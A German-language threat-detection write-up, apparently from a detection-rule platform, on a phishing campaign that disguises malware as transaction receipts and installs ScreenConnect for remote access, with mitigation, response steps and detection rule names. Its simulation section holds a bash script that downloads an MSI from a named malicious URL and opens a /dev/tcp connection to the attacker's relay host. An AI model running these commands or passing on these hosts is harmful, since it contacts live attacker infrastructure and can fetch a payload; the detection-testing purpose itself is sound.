Malware-Phishing-Betrug: Phishing-E-Mails als Transaktionsquittungen getarnt
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsakteure senden Phishing-E-Mails, die sich als Mitarbeiter von US-Unternehmen ausgeben und Anhänge enthalten, die als Transaktionsbelege getarnt sind. Der Angriff nutzt ein bösartiges PDF, um Benutzer dazu zu verleiten, ein vermeintliches Adobe Flash Player-Update herunterzuladen, das tatsächlich ein VBScript startet. Das Skript installiert dann das legitime ScreenConnect-Remote-Verwaltungstool, um einen persistierenden Fernzugriff für weiterführende Aktivitäten zu ermöglichen.
Untersuchung
Das AhnLab Security Intelligence Center (ASEC) identifizierte die Kampagne durch Untersuchung des Inhalts der Phishing-E-Mail und des Verhaltens des angehängten PDFs. Die Untersuchung verfolgte die Ausführungskette vom bösartigen VBScript bis zum Abrufen der Hintergrundnutzlast und der stillen Installation eines MSI-Pakets mit curl.exe and msiexec.exe.
Abschwächung
Benutzer sollten darin geschult werden, Phishing-Versuche zu erkennen, die unerwartete Transaktionsbelege und Aufforderungen zur Installation von Software-Updates wie Adobe Flash Player beinhalten. Organisationen sollten die Ausführung von VBScript einschränken und die unautorisierte Verwendung von Remote-Management-Tools einschließlich ScreenConnect überwachen. Anwendungsspezifische Zulassungslisten können auch helfen, die Ausführung unbekannter oder nicht zugelassener MSI-Pakete zu verhindern.
Reaktion
Wenn bösartige Aktivitäten erkannt werden, sollte das betroffene System sofort isoliert werden, um den Fernzugriff über ScreenConnect zu verhindern. Antwortgeber sollten aktive Sitzungen beenden, die mit relay.Gamedbd.Com -Infrastruktur verbunden sind, und das Register auf gespeicherte Sitzungsinformationen überprüfen. Eine vollständige forensische Untersuchung sollte auch klären, ob laterale Bewegungen oder Datenexfiltration über das Remote-Management-Tool stattgefunden haben.
Angriffsablauf
Wir aktualisieren diesen Teil noch.
Erkennungen
LOLBAS WScript / CScript (über process_creation)
Alternative Zugriffs- / Verwaltungssoftware (über process_creation)
Mögliche Dateninfiltration / -exfiltration / C2 über Drittanbieterdienste / -tools (via Proxy)
Mögliche Dateninfiltration / -exfiltration / C2 über Drittanbieterdienste / -tools (via DNS)
IOCs (HashMd5), um zu erkennen: Malware-Phishing/Betrug: Phishing-E-Mails, die sich als Transaktionsbelege tarnen
Erkennung von Phishing-E-Mails, die sich als Transaktionsbelege tarnen [Proxy]
Phishing-E-Mail, die sich als Transaktionsbeleg ausgibt und zur Installation des MSI-Pakets führt [Windows-Prozesserstellung]
Ausführung der Simulation
Voraussetzung: Der Telemetrie- & Basislinien-Vorab-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifer-Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und das Narrativ MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die vom Erkennungsskript erwartete Telemetrie zu erzeugen. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffsablauf & Befehle: Der Angreifer startet eine Phishing-Kampagne, indem er eine E-Mail zu einer fehlgeschlagenen Transaktion sendet. Der Link leitet das Opfer zu
https://transaction-sucessful.vercel.app, welches einen gefälschten Beleg hostet. Wenn das Opfer auf „Beleg herunterladen“ klickt, versucht der Browser,https://payment-six-eta.vercel.app/doc/sc.msizu laden. Sobald die Nutzlast ausgeführt wird, versucht sie, eine Fernzugriffssitzung herzustellen, indem sie sich mit dem ScreenConnect-Relay beirelay.gamedbd.com:8041verbindet. Diese Sequenz testet sowohl die URL-basierte Erkennung als auch die Erkennung auf Basis von Domäne/Port. -
Regressionstest-Skript:
#!/bin/bash # Simulationsskript zur Auslösung der Phishing/ScreenConnect-Erkennungsregel echo "[+] Start der Simulation: Phishing/ScreenConnect Erkennungstest" # 1. Simulation des Downloads des bösartigen MSI von der Vercel-URL echo "[+] Schritt 1: Verbindung zur bösartigen Vercel-URL simulieren..." curl -s -o /dev/null "https://payment-six-eta.vercel.app/doc/sc.msi" # 2. Simuliere die Verbindung zur spezifischen ScreenConnect-Relay-Domain/Port echo "[+] Schritt 2: Verbindung zum bösartigen ScreenConnect-Relay simulieren..." # Wir verwenden /dev/tcp, um einen Verbindungsversuch zu simulieren, ohne einen echten Listener zu benötigen timeout 2 bash -c 'cat < /dev/null > /dev/tcp/relay.gamedbd.com/8041' 2>/dev/null echo "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Warnungen." -
Bereinigungsbefehle:
# Dieses netzwerkbasierte Simulation erzeugt keine persistenten Artefakte. # Falls lokal Dateien heruntergeladen wurden, sollten diese entfernt werden: rm -f sc.msi echo "[+] Bereinigung abgeschlossen."